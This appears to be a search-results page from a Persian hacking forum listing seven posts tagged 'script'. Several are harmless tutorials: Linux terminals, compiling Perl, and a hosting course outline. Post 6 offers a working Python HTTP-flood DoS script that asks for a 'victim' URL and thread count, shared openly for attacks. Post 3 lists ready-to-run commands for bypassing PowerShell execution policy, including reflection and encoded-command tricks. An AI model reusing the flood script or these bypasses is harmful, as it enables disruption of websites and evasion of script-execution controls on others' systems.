ts icon
سرور تیم اسپیک گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اسکریپت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

7 نتیجه پیدا شد

  1. اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm http://www.eterm.org Final Term http://finalterm.org GNOME Terminal https://help.gnome.org/users/gnome-terminal/stable Guake https://github.com/Guake/guake Konsole Terminal http://konsole.kde.org LillyTerm http://lilyterm.luna.com.tw/index.html LXTerminal http://wiki.lxde.org/en/LXTerminal mrxvt https://code.google.com/p/mrxvt ROXTerm http://roxterm.sourceforge.net rxvt http://sourceforge.net/projects/rxvt rxvt-unicode http://software.schmorp.de/pkg/rxvt-unicode Sakura https://launchpad.net/sakura st http://st.suckless.org Terminator https://launchpad.net/terminator Terminology http://www.enlightenment.org/p.php?p=about/terminology tilda http://tilda.sourceforge.net/tildaabout.php UXterm http://manpages.ubuntu.com/manpages/gutsy/man1/uxterm.1.html Wterm http://sourceforge.net/projects/wterm xterm http://invisible-island.net/xterm Xfce4 Terminal http://docs.xfce.org/apps/terminal/start Yakuake http://extragear.kde.org/apps/yakuake خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
  2. Goodzilam

    جستجوگر BTC

    درود، چند ماه پیش اسکریپتی نوشته بودم که ولت های بیتکوین به صورت رندوم ایجاد میکرد و موجودیشون رو چک میکرد به این صورت توضیح بدم که با این اسکریپت درک میکنید چرا احتمال ایجاد دو ادرس بیتکوین با هش های یکسان نزدیک به 0 هست و تقریبا هیچوقت دو حساب متشابه ایجاد نمیشود ! حدود (2 به توان 256) تا آدرس بیتکوین وجود داره و شانس پیدا کردن 1 ادرس به همراه موجودی چیزی حدود: 2x10^15/(2^256)=2x10^-62 هست ! به هر حال ... نصب پیش نیازها: ف.یلتر ش.کن Python 3 یا بالا تر OS : Linux pip install selenium apt-get update apt install chromium-chromedriver cp /usr/lib/chromium-browser/chromedriver /usr/bin آدرس اسکریپت: https://raw.githubusercontent.com/Goodzilam/BTCFinder/master/main.py اگر از سرویس زیر استفاده نمیکنید نیاز دارید تا بخشی از کد که مشخص شده رو تغییر بدید ! به این صورت که، ادرس پوشه ی فایل های دانلودیتون رو با ادرس از قبل نوشته شده تغییر بدید ! file = open("/content/output-onlinehashtools.txt", "r") # replace your download directory path <======== تغییر پیدا میکنه به : file = open("ادرس/فولدر/دانلود/شما/output-onlinehashtools.txt", "r") برای راحتی کار و نداشتن نیاز به تغییر کد، پیشنهاد میکنم از سرویس Google Colab استفاده کنید، گوگل محیطی آماده برای اجرای برنامه ها در اختیار ما قرار میده، 12 گیگ رم و 70گیگ حافظه به صورت رایگان ! آدرس Google colab: https://colab.research.google.com/
  3. بررسی policy ها در powershell و روش های دور زدن آنها همون طور که می دونید در powershell به جهت جلوگیری از اجرا شدن اسکریپت های خطرناک و جلوگیری از دسترسی های راه دور و … مایکروسافت یک سری محدودیت ها و policy ها تعریف کرده که می توان توسط کاربر تنظیم شود . این محدودیت ها در سطوح محتلف کاربری اعمال می شود. جهت تعریف این policy ها می توانیم از فرمان Set-ExecutionPolicy در powershell استفاده کنیم . با استفاده از این فرمان می توانیم تعیین کنیم که آیا کاربران در گروه های کاربری مختلف حق اجرای اسکریپت را دارند یا خیر ؟ این فرمان دارای چند نوع مجوز است. Restricted : که اجازه اجرای اسکریپت را به طور کل به هیچ کاربری نمی دهد AllSigned : تنها اسکریپت هایی که دارای امضای یک ناشر مورد اعتماد شرکت مایکروسافت قابل اجرا است. RemoteSigned : تنها اسکریپت هایی که دارای امضای دیجیتالی قابل اعتماد در سطح اینترنت است قابل اجرا است. Unrestricted : تمامی اسکریپت ها قابل اجرا می باشد فقط قبل از اجرای یگ اسکریپت در سطح اینترنت از شما سوال پرسیده می شود . Bypass : همه ی اسکریپت ها قابل اجرا می باشد و هیچ سوالی هم پرسیده نمی شود Undefined : جهت حذف سیاست های امنیتی بالا مورد استفاده قرار می گیرد شما می توانید با استفاده از فرمان زیر سیاست های بالا را اعمال کنید. Set-ExecutionPolicy Restricted که باعث جلوگیری از اجرای اسکریپت توسط کار بر می شود Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted همچنین می توان بر روی یک دامنه ی زیر این محدودیت ها را اعمال کرد. MachinePolicyUserPolicyProcess CurrentUser LocalMachine در نهایت جهت دیدن لیستی از سیاست های امنیتی بر روی دامنه ها را با استفاده از فرمان زیر مشاهده کنید . PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize Scope ExecutionPolicy --------------- ----- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser Unrestricted LocalMachine Unrestricted خوب حالا ما با استفاده از فرمان بالا اجرای اسکریپت را در سطح حساب کاربریمان می بندیم و سپس به شما نشان می دهیم که چگونه می توان آن محدودیت ها را دور زد . و اسکریپت خود را اجرا نمود . اول از همه یک فرمان ۲ خطی می نویسیم و آن را با پسوند PS1 ذخیره می کنیم به عنوان مثال فرمان Write-Host “BYPASSED” calc.exe حال اگر بخواهیم در حالت عادی آن را اجزا کنیم با خطای زیر مواجه می شویم. PS C:\test> .\a.PS1 .\a.PS1 : File C:\test\a.PS1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\a.PS1 + ~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess روش های زیر جهت دور زدن سیاست های امنیتی در پاورشل ویندوز است. PS C:\test> Get-Content .\a.PS1 | PowerShell.exe -noprofile - BYPASSED PS C:\test> و PS C:\test> get-content .\a.PS1 | powershell.exe - bypassed PS C:\test> و همچنین نقطه مقابل دستور get-content در CDM که دستور Type می باشد. PS C:\test> TYPE .\a.ps1 | PowerShell.exe -noprofile - bypassed PS C:\test> همپنین می توان با استفاده از فرمان invoke-expression و pipline به گونه ای دیگر دستور را فراخوانی کرد. PS C:\test> Get-Content .\a.PS1 | Invoke-Expression bypassed PS C:\test> TYPE .\a.ps1 | Invoke-Expression bypassed می توان از کلمه ی اختصاصی فرامین نیز استفاده کرد Get-content = GC Invoke-expression = IEX PS C:\test> GC .\a.PS1 | iex bypassed می توان به خود فرمان ExecutionPolicy گفت که این یک فایل را در نظر نگیر PS C:\test> PowerShell.exe -ExecutionPolicy Bypass -File .\a.PS1 bypassed و یا خیر بگوییم سطح دسترسی را برای این فایل تغییر بده PowerShell.exe -ExecutionPolicy UnRestricted -File .\a.ps1 bypassed همچنین می توان با فراخوانی توابع بدون استفاده از تابع AuthorizationManager نیز این کار را انجام داد برای اینکار می توانید داخل profile های powershell یک تابع با نام دلخواه انتخاب کنید که من این جا نام آنرا d-exe می زاریم function D-Exe {> ($ ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,").setvalue($ctx, (new- object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } و سپس می توان فایل را اجرا کنید . PS C:\test>D-exe .\a.PS1 bypassed همچنین می توان با تغییر در رجیستری این کار را انجام داد HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShellExecutionPolicy و می توانید مقدار ExecutionPolicy را به مقدار Unrestricted را تغییر داد .و در نهایت فایل را مستقیم به صورت معمولی انجام داد . PS C:\test>.\a.PS1 bypassed همچنین می توانید از طریق CMD هم سویچ کنید به powershell و اسکریپت داخل آن را اجرا کنید کافیست یک فایل Bat ایجاد کنید و در آن کد زیر را کپی نمایید . @echo off REM: Bypass.bat REM: cmd /C a.bat a.ps1 powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out- string))))" و سپس در cmd فرمان زیر را وارد کنید. a.bat a.ps1 و می بینید که کد اجرا می شود . یعنی در اصل ما توانستیم با استفاده از فرامین مختلف policy مربوط به powershell که توسط فرمان Set-executionpolicy انجام می شود را دوز بزنیم و فایل و یا اسکریپت خود را اجرا کنیم . امیدوارم مفید بوده باشد .
  4. سلام در این آموزش قصد داریم با دورک های گوگل اسکریپت های تست نفوذ رو پیدا کنیم در سایت گیت هاب. دستوری که میزنیم به این شکل هست: inurl:github.com intext:hacking script و همه اسکریپت های تست نفوذ که در گیت هاب قرار دارن نمایش داده میشن. موفق باشید
  5. به نام ایزد منان بدون مقدمه میرم سر اصل مطلب هدف از ایجاد این تاپیک این هست که شما بتوانید به عنوان شخصی حرفه ای کار هاستینگ و سرور انجام بدید و کسب در آمد بالایی داشته باشید. سر فصل ها : 0.1 مقدمه 0.2 وب سرور چیست و چگونه باید آن را ساخت 0.3 چگونه سروری مناسب است 1.0سرور 1.1 سرور رایگان 1.2 علم سرور هکینگ ، گنج است. 1.3 کانفیگ اولیه سرور 1.4 aws=>amazon web survices 1.5 apche Http Server =>windows and linux 1.6 iis for windows 2.7 سرور شخصی خودتان را بسازید 2.8 سرور مجازی شخصی خودتان را بشازید 3.0 هاستینگ 3.1 ساخت localhost در ویندوز و لینوکس 3.2 استفاده از static ip به جای localhost 3.3 تبدیل سرور به هاست دانلود. آموزش ها به صورت متنی و در صورت افاقه نکردن ، ویدیویی همراه با صدا خواهد بود. نظرات فراموشتنون نشه. تا درودی دیگر بدرود.
  6. با سلام خدمت دوستان براتون یک اسکریپت خوب در زمینه DDoS گذاشتم. زبان اسکریپت : پایتون. #/usr/bin/Python # -*- coding: utf-8 -*- import sys import time import threading import urllib time.sleep(3) a=1 b=threading.Lock() class dos(threading.Thread): def __init__(self, host, threads): threading.Thread.__init__(self) self.host = host self.threads = threads def run(self): global a global b b.acquire() print "\n chuẩn bị -> {0}".format(self.threads) b.release() while 1 == a: try: urllib.urlopen(self.host).read try: urllib.urlopen(self.host).read except: pass except: pass b.acquire() print " số lượng {0}\n".format(self.threads) b.release() sys.exit() try: threads=input(" Số lượng(100000) : ") except NameError: sys.exit() while True: host=raw_input("\n victim : ") print "\n Đang kiểm tra website \n" time.sleep(2) try: urllib.urlopen(host) except IOError: print "\nKhông thể kết nối vào victim\n" sys.exit() else: break print "\n"*100 c=raw_input(" Bấm Y để tấn công N để dừng ( Y/N ) > ") if c=="Y": pass elif c=="N": print "\n Thoát.\n" sys.exit() for A in xrange(threads): dos(host, A+1).start() a=0 print " Tấn công thành công \n" این هم نحوه کار با این اسکریپت: http://guardiran.org/forums/topic/1420-%D8%A7%D9%85%D9%88%D8%B2%D8%B4-%DA%A9%D8%A7%D9%85%D9%84-%DA%A9%D8%A7%D8%B1-%D8%A8%D8%A7-%D8%A7%D8%A8%D8%B2%D8%A7%D8%B1-%D9%87%D8%A7%DB%8C-dos-ddos/page-2#entry10278 خیلی خوب میشد یک تالار برای اسکریپت های دیداس داشتیم. تشکر نشانه رضایت شماست
  7. درود در این آموزش تصویری طریقه اجرا کردن ( کامپایل کردن ) اسکریپت پرل Perl Script Compile رو در ویندوز به شما آموزش میدم و این فیلم رو به درخواست یکی از اعضاء محترم تیم ضبط کردم و امیدوارم مشکلشون حل بشه و فیلم کاملا گویاست و برای دوستان مبتدی و تازه کار بسیار مفیده و جای سوالی باقی نمی مونه . دوستان توجه داشته باشند ابتدا باید اکتیو پرل Active Perl رو در سیستم خودتون نصب کنید و از لینک زیر می تونید دریافت می کنید : http://www.activestate.com/activeperl/downloadsپسورد فایل : guardiran.org . Perl Script Compile.rar